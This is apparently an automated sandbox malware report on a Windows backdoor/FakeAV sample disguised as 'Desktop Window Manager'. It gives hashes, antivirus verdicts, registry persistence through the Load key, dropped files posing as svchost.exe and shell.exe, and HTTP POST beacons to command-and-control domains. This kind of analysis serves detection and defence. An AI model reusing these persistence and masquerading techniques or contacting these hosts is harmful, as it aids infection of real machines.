Analysis Date: 2014-12-03 07:11:17
MD5: 1054faa2b7c387d022a986eab25de9bb
SHA1: 1837e4ca8706ae6d28f4d4ad61899020fa08f43b

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section: .text md5: e5639527a151b75ff61957a16e7a3bff sha1: da4cf0b3e2848ea4a2acc33d89bf3f85b7ebccc4 size: 59904
Section: .rdata md5: 7e36b9fe976071b59f45e441080369e0 sha1: 947099e68597a62d5716b7c4a6b126d96fe14ff1 size: 5120
Section: .data md5: 4457667c27e786be25d60dbc62bee843 sha1: 4dbc10d69ef437fccb5cbc666b29ba319beb118f size: 41472
Section: .rsrc md5: f16d3ddf753f2bd79df60d807995e971 sha1: 79d43f37515053254dd2d286fb2b71ceec4668f8 size: 1024
Timestamp: 2005-09-25 05:52:42
Version:
LegalCopyright: Copyright (C) 2010
InternalName: c3
FileVersion: 1, 0, 0, 1
FileDescription: Desktop Window Manager
ProductVersion: 1, 0, 0, 1
PrivateBuild: 1102
OriginalFilename: c3.exe
PEhash: 9b9ca81ca3394aaab5bc6dfd346f18cb63bc1ab2
IMPhash: 5cefe899eb9638767aafec9e02fcae7f
AV: 360 Safe - Gen:Heur.Conjar.2
AV: Ad-Aware - Gen:Heur.Conjar.2
AV: Alwil (avast) - MalOb-IJ [Cryp]
AV: Arcabit (arcavir) - Packed.Krap.hy
AV: Authentium - W32/Goolbot.A.gen!Eldorado
AV: Avira (antivir) - TR/Crypt.XPACK.Gen
AV: BullGuard - Gen:Heur.Conjar.2
AV: CA (E-Trust Ino) - Win32/FakeAV.S!generic
AV: CAT (quickheal) - Backdoor.Cycbot.B
AV: ClamAV - Trojan.Agent-185063
AV: Dr. Web - Trojan.MulDrop1.49662
AV: Emsisoft - Gen:Heur.Conjar.2
AV: Eset (nod32) - Win32/Kryptik.HPG
AV: Fortinet - W32/Swisyn.AOE!tr
AV: Frisk (f-prot) - W32/Goolbot.A.gen!Eldorado
AV: F-Secure - Gen:Heur.Conjar.2
AV: Grisoft (avg) - Win32/Cryptor
AV: Ikarus - Packed.Win32.Krap
AV: K7 - Backdoor ( 04c51d251 )
AV: Kaspersky - Packed.Win32.Krap.hy
AV: MalwareBytes - Trojan.Agent.Gen
AV: Mcafee - BackDoor-EXI
AV: Microsoft Security Essentials - Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan) - Gen:Heur.Conjar.2
AV: Norman - Gen:Heur.Conjar.2
AV: Rising - no_virus
AV: Sophos - Troj/FakeAV-BVU
AV: Symantec - Trojan.FakeAV!gen39
AV: Trend Micro - BKDR_CYCBOT.SME
AV: VirusBlokAda (vba32) - no_virus

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows
Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Winsock DNS: www.google.com
Winsock DNS: 127.0.0.1
Winsock DNS: 8.ctrl.fajujohiv.cn
Winsock DNS: fajujohiv.cn
Winsock DNS: 7.ctrl.fajujohiv.cn

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe

Network Details:

DNS: protectyourpc-11.com, Type: A, 74.200.250.181
DNS: www.google.com, Type: A, 173.194.37.52
DNS: www.google.com, Type: A, 173.194.37.51
DNS: www.google.com, Type: A, 173.194.37.50
DNS: www.google.com, Type: A, 173.194.37.49
DNS: www.google.com, Type: A, 173.194.37.48
DNS: fajujohiv.cn, Type: A
DNS: 7.ctrl.fajujohiv.cn, Type: A
DNS: 8.ctrl.fajujohiv.cn, Type: A
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err073_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err083&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err095_0_7&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err088_2_0&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err073_2_1&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err083&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err095_1_8&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err094_43_11001&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v30&system=6.0.2900|5.1.2600|1033&id=A590474043D74FFC75DE&status=err093_43_11001&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1032 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1033 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1034 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1035 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1036 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1037 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1038 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1039 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1040 ➝ 173.194.37.52:80
Flows TCP: 192.168.1.1:1041 ➝ 173.194.37.52:80
Flows TCP: 192.168.1.1:1042 ➝ 74.200.250.181:80
Flows TCP: 192.168.1.1:1043 ➝ 74.200.250.181:80

Raw Pcap

Strings